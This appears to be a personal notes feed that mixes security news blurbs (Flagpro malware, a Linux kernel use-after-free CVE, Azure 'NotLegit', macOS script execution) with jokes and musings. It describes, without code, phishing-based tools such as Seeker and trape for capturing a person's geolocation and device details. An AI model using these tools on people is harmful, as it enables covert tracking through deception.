Notes

Friendly reminder, now that BlackBerry is gone Mozilla is next in line.

Just stick to the light, don’t ruminate in darkness or you’ll start to become that way.

This is why you should NEVER copy paste commands directly into your terminal. Ask any developer or Admin if they have ever copied a command line or code snippet from the web. The answer would probably be YES. You would assume that what you copied is what you paste, right? Well, nope!

You think you are copying one thing, but it’s replaced with something else, like malicious code. All it takes is a single line of code injected into the code you copied to create a backdoor to your app.

↳ How to get hacked by accidentally copy pasting

ProxyBroker is an open source tool that asynchronously finds public proxies from multiple sources and concurrently checks them.

• Finds more than 7000 working proxies from ~50 sources.
• Support protocols: HTTP(S), SOCKS4/5. Also CONNECT method to ports 80 and 23 (SMTP).
• Proxies may be filtered by type, anonymity level, response time, country and status in DNSBL.
• Work as a proxy server that distributes incoming requests to external proxies. With automatic proxy rotation.
• All proxies are checked to support Cookies and Referer (and POST requests if required).
• Automatically removes duplicate proxies.
• Is asynchronous.

↳ ProxyBroker

Wishing you 12 months of success, 52 weeks of laughter, 365 days of fun, 8760 hours of joy, 525600 minutes of good luck, and 31536000 seconds of happiness. Happy New Year!

Tools for determining the exact geolocation of the user (actually the location of his smartphone, table or PC). The algorithm of these tools is simple: the tool creates a “phishing” site that requests access to the user’s geolocation and passes it on to you. Thus, using Social Engineering techniques and these tools you can obtain information about geolocation, browser fingerprint, IP address and device information.

• Seeker
• TrackURL
• trape

People who use cloud-based password managers are special.

Flagpro is used in the initial stage of attacks to investigate target’s environment, download a second stage malware and execute it. An attack case using Flagpro starts with a spear phishing e-mail. The message is adjusted to its target organization. It is disguised as an e-mail communication with target’s business partner. This means the attackers probed deeper into their target before attacking.

The attackers attach a password protected archived file (ZIP or RAR) to the email, and they write its password in the message. The archived file includes an xlsm format file and it contains a malicious macro. If a user activates the macro, a malware will be dropped. They also adjust the content of the xlsm file to the target. Therefore, it is not easy to feel at odds with the file sent by the attacker.

↳ Flagpro: The new malware used by BlackTech

Sony, SanDisk, and Lexar provide encryption software for their USB keys, hard drives, and other storage products. The software is already present when buying a new product and used to keep data on the storage safe. This solution is developed by a 3rd party called ENCSecurity. The security claims of this solution were very strong i.e. “Ultimate encryption using 1024 bit AES keys Military grade”. Our analysis of the DataVault software revealed three serious flaws impacting the security of the DataVault solution. This presentation is a look the flaws we identified along with our process for discovery and how the vulnerabilities were addressed. Practical bruteforce of military grade AES-1024

Recently a use-after-free vulnerability was discovered in the Linux kernel TEE subsystem, up to and including version 5.15.11, and was assigned CVE-2021-44733.

At a first glance it did not seem to be exploitable for several reasons, however after some further analysis of the vulnerable code path and by implementing a crude proof-of-concept exploit it was possible to overwrite a function pointer in the kernel. No privilege escalation payload is presented in this post, however the entire environment for running OPTEE and the exploit is available for further testing, see ‘Setting up the environment’. CVE-2021-44733 - Fuzzing and exploitation of a use-after-free in the Linux kernel TEE subsystem

As a reminder, the legacy services for BlackBerry 7.1 OS and earlier, BlackBerry 10 software, BlackBerry PlayBook OS 2.1 and earlier versions, will no longer be available after January 4, 2022. As of this date, devices running these legacy services and software through either carrier or Wi-Fi connections will no longer reliably function, including for data, phone calls, SMS and 9-1-1 functionality. Blackberry devices and services EOL January 4, 2022

Quick tip if you want IPv6 off on macOS 12 Monterey, since Apple disabled the Off option from the Configure IPv6 toggle, for your own safety, of course:

On WiFi:

$ networksetup -setv6off Wi-Fi

On Ethernet:

$ networksetup -setv6off Ethernet

The Wiz Research Team detected an insecure default behavior in the Azure App Service that exposed the source code of customer applications written in PHP, Python, Ruby, or Node, that were deployed using “Local Git”. The vulnerability, which we dubbed as “NotLegit”, has existed since September 2017 and has probably been exploited in the wild.

Wiz reported this security flaw to Microsoft on October 7th, 2021, and by now it has been mitigated. Small groups of customers are still potentially exposed and should take certain user actions to protect their applications, as detailed in several email alerts Microsoft issued between the 7th - 15th of December, 2021. NotLegit: Azure App Service vulnerability exposed hundreds of source code repositories

Just tried to fix my old dell laptop. I opened it tried fiddling with the heat sink and stuff and then opened bios with the innards still exposed…and then it suddenly started playing what sounded like a dodo do dodo tune at a volume 10x louder than I thought the speakers could produce and then after that- started making an ominous urgent beeping noise but even louder. At that point I thought oh fuck it’s gonna explode or shock me I. I tried to pull out the battery and power cable and recoiled back in pursuit of cover but fell sideways my out of my rocking chair hitting my head on the doors beside me. What the FUCK happened?

4chan never ceases to amaze me.

The astute reader may have noticed that though the script started with the familiar #! (“Shebang”), it is missing an interpreter such as /bin/bash. However when launched, macOS seems to handle this without issue, and still executed the script.

Specifically, as shown below, in the output of a process monitor, when launched you can first see launchd exec’ing xpcproxy. This then executes /bin/sh, which in turn executes /bin/bash to execute the PoC (which has been translocated, as its from the Internet). Where’s the Interpreter!? (CVE-2021-30853)

Earlier this month, I posted a link to an article I wrote, titled Burning Witches, on LinkedIn. When I checked to see if there were any comments, the post was gone. I was given no notification, and received no e-mails, indicating that the post had been removed. I’ve previously written about how Facebook is hostile to smaller platforms. It seems like LinkedIn is also participating in the new era of corporate censorship, but what makes their actions more sinister is that they do so without providing their users any notifications of post removal. LinkedIn Silently Deleted Several of My Posts

If you attempt to understand the “meaning of life”, you will always come to the conclusion that it is inherently meaningless.

There never was a free market, not in the middle ages and definitely not now. Back then you had guilds monopolising jobs, now you have regulators rigging the market. The modern big tech companies learned painfully that you need to live with burning money on bribes and play the politics game as they struggled with it for quite a while trying to ignore it.

The warm glow of the phosphor burns your eyes, as the rhythmic echo of the keyboard rings in your ears. Day and night blend into one, and time stands still.